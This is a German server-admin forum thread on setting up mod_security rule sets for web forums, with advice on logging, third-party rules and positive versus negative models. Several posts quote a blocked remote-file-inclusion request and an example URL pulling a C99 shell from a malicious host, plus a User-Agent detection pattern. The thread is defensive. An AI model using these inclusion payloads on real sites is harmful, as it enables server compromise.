mod_security

Apache, Lighttpd, nginx, Cherokee
mowgly
Posts: 11
Joined: 2007-04-29 13:39

mod_security

Post by mowgly » 2008-01-07 22:21

Hi,
ich habe einen Root-Server und wollte mich mal über die Mod security Regeln hermachen . Ich habe verschieden Boards am laufen joomla und pn und wollte einen geeigneten Regelsatz haben. Leider gibt das Internet nicht alles her, deswegen suche ich ein Buch. * der Trend geht ja zum 2-t Buch* . Wenn jemand was hat ... in deutsch wäre es sehr schön.
:google: sagt mir auch nur so halbwahrheiten von halbweisen, die ich dann selber zusammenfrickeln muß.
Die Grobe Adminstration läuft über Plesk 8.3.0

Vorweg:
Bitte nur Vorschläge und keine Allgemeinen Lebenphilosophien über die grundlegende Weisheit der Administration.
Der Heise Artikel (http://www.heise.de/security/artikel/69070/1) ist zwar ganz nett aber wenn ich die Regeln von gotroot einspiele dann geht gar nicht's mehr. Deswegen möchte ich mod_ security selber verstehen und mal als Nachschlagewerk haben.

Danke für eure Buchvorschläge.

Roger Wilco
Administrator
Administrator
Posts: 5924
Joined: 2004-05-23 12:53

Re: mod_security

Post by Roger Wilco » 2008-01-07 23:06


mowgly
Posts: 11
Joined: 2007-04-29 13:39

Re: mod_security

Post by mowgly » 2008-01-08 18:50

Hallo,
Ja, die kenne ich.
Ich danke dir trotzdem vielmals.

chrisw
Posts: 57
Joined: 2006-07-26 13:21

Re: mod_security

Post by chrisw » 2008-01-08 20:58

Dann lass mod_security doch erstmal nur loggen - du musst ja nicht gleich blocken, und afaik wird das in der Doku als erster Schritt auch empfohlen.

Wenn du dein Ruleset nicht selbst erstellt hast, dann lass das von gotroot erstmal eine Woche laufen und klick fleißig auf deinen Webseiten rum. Dann nimmst du dir den Debug Log vor, den du selbstverständlich eingestellt hast, und schaust nach, welche Regeln "Ärger" machen.

Schau nach, wieso es ein Problem gibt - behebe es, oder deaktiviere die betreffende Regel. In der Zwischenzeit, kannst du weiter nach einem Buch suchen (ich kenne leider keins) oder dich z.B. in den Supportforen der von dir eingesetzten Software schlau machen, ob es jemand gibt, der schon Erfahrungen mit mod_security und ebendieser Software gemacht hat.

Alternativ kannst du dir auch bekannte Sicherheitslücken für die von dir betriebene Software anschauen, herausfinden, wie die Exploits funktionieren und deine eigenen Regeln schreiben. Das ist dann aber wirklich Arbeit ;)

Wenn alles funktioniert, wie es soll, dann kannst du mod_security blocken / was-auch-immer lassen

Das ist jetzt auch keine, wie du nennst "Weisheit", sondern so lernt man es am besten.

Beispiel für debug:

Code: Select all

Request: 66.160.***.** - - [07/Oct/2007:14:26:47 +0200] "GET /kb.php/includes/kb_constants.php?module_root_path=http://www.spindl-hotelpraha.cz/system/temp/id.txt? HTTP/1.1" 403 986
Handler: type-map
----------------------------------------
GET /kb.php/includes/kb_constants.php?module_root_path=http://www.spindl-hotelpraha.cz/system/temp/id.txt? HTTP/1.1
Connection: close
Host: www.domain.tld
User-Agent: libwww-perl/5.79
mod_security-message: Access denied with code 403. Pattern match "(libwhisker|paros|libwww|perl|curl|java|lwp)" at HEADER
mod_security-action: 403

HTTP/1.1 403 Forbidden
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Vary: accept-language, accept-charset


Hier sieht man einen Exploit Versuch auf die phpBB 2.0.x knowledge base (die ich nicht mal installiert habe), die Aufgrund des User-Agents libwww-perl geblockt wurde...
Ein Stück weiter unten im Ruleset gäbe es dann eh noch eine Regel für phpbb_root_path, aber die User-Agent ging vor. Man sieht auch, welche Regel den Block verursacht hat (Pattern Match)

mowgly
Posts: 11
Joined: 2007-04-29 13:39

Re: mod_security

Post by mowgly » 2008-01-08 21:45

Hallo,
nun recht vielen dank für deinen Post aber mod_security einfach so laufen zu lassen ist ein wenig Risikobehaftet, wenn man bedenkt wer bei mir alles an die Tür klopft und versucht reinzukommen... Ich werde halt mal sehen, dass ich erst einmal den Standardregelsatz von heise laufen lasse und der, der ärger macht in die blacklist kommt und die Ip gesperrt wird. Dann werde ich nach und nach sehen, dass ich die Regeln aktiviere. ich denke bestimmte Sätze von gotroot sind nicht schlecht wie z.B. blacklist oder rootkits bad robtos oder trojans. Deswegen werde ich die wohl eher nicht anpacken & ändern. Es wäre schon skuril wenn man weiß was alles so rumkreucht und fleucht. Da muß ich denke mal vertrauen haben in renomierte Anbieter dieser Regeln.

Gruß
Mowgly

chrisw
Posts: 57
Joined: 2006-07-26 13:21

Re: mod_security

Post by chrisw » 2008-01-08 22:39

Hallo,

mod_security mit einem Regelsatz, der nicht komplett ist, bringt dir aber auch nicht viel.

Du kannst natürlich auch debuggen, während du alles blockst - ist aber nicht die feine Art gegenüber den Benutzern. Ist das Problem mit den klopfenden Leuten so akut ? Ich ging nach deinem ersten Post von der Annahme aus, dass du mod_security gerade erst aufsetzt.

Am meisten Ärger machen bei Foren die Regelsätze gegen MySQL-Injections von gotroot, es dürfte schon einiges bringen, diese am Anfang außen vor zu lassen.

Grüße,
Chris

mowgly
Posts: 11
Joined: 2007-04-29 13:39

Re: mod_security

Post by mowgly » 2008-01-09 18:30

mysqlinjection und und wget geschichten mit http://xyz.de/../../xyz/wget=* komm auf Fachbegriff gearde nicht *bin momentan faul .. komme gerade von der Arbeit* . Nun man versucht über ein HTML Pfad Progamme auszuführen welche Scripte runterladen oder direkt ausführen, welche sich dann noch auf dem Server einnisten und nach Securityholes suchen.
Das sind die Hauptsächlichen Übeltäter. Die Programme sind größtenteils alle schon mit chmod 744 umgelegt worden.... aber es nervt halt.
Der Grundgedanke ist unter anderem: Erst Hütte zu und dann schauen was man öffnen kann ... wenn man die Hütte auf hat, kann sich jemand einnisten den man nicht sieht. Finde ich riskanter. Und dem User muß klar sein: Sicherheit geht vor .

Gruß
Mowgly

chrisw
Posts: 57
Joined: 2006-07-26 13:21

Re: mod_security

Post by chrisw » 2008-01-10 11:25

Remote File Inclusion ?

Also solche URLs in den logs:

Code: Select all

http://www.vulnerable.website.com/index.php?page=http://www.malicious.code.com/C99.php?


Wenn du sagst, Sicherheit geht vor, dann kannst du auch die Regeln von gotroot nehmen, aktivieren... nebenbei loggen, und Regeln die irrtümlich greifen anpassen ?

Der Server wurde aber nicht bereits schon kompromittiert ?

User avatar
daemotron
Administrator
Administrator
Posts: 2635
Joined: 2004-01-21 17:44

Re: mod_security

Post by daemotron » 2008-01-10 18:06

Seit Version 2 kann mod_security auch mit einem positive model betrieben werden (alles wird abgeblockt außer Requests, für die es eine passende Positiv-Regel gibt). Das ist IMHO bei den meisten Setups nicht nur methodisch sauberer, sondern auch wesentlich ressourcenschonender als ein Negativ-Modell. Und wer will sich schon anmaßen, alle Eventualitäten im Ausschlußprinzip zu erwischen?
(Quelle: http://www.modsecurity.org/documentatio ... tml#N10027)

ddm3ve
Moderator
Moderator
Posts: 1187
Joined: 2011-07-04 10:56

Re: mod_security

Post by ddm3ve » 2015-10-07 16:52

Ich krame mal den Artikel vor.
Da sich bei uns diverse Botten tummeln wird auch für mich mod_security wieder deutlich aktueller.
Für mich stellt sich die Frage, welche regeln Sinn machen oder wo man zuverlässige Regeln her bekommt.
Das negativ Modell ist aber aus meiner Sicht der beste Ansatz. So, kann ich erstmal alles Debugger lassen, prüfen, was rein kommt und dann daraus positive regeln ableiten.
Das eine oder andere Problem habe ich z.B. mit einzelnen Applikationen, false positives wenn jemand den webmailer nutzt z.B. oder das schon genannt Beispiel Foren.
02:32:12 21.12.2012 und dann sind Deine Probleme alle unwichtig.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11138
Joined: 2003-02-27 01:00
Location: Hamburg

Re: mod_security

Post by Joe User » 2015-10-09 19:38

PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

User avatar
rudelgurke
Posts: 405
Joined: 2008-03-12 05:36

Re: mod_security

Post by rudelgurke » 2015-10-19 19:29

Unter https://waf.comodo.com/ stellt Comodo auch Rules bereit. Zumindest ein Blick darauf kann vielleicht nicht schaden.

ddm3ve
Moderator
Moderator
Posts: 1187
Joined: 2011-07-04 10:56

Re: mod_security

Post by ddm3ve » 2015-10-26 23:43

Vielen Dank schon mal.
02:32:12 21.12.2012 und dann sind Deine Probleme alle unwichtig.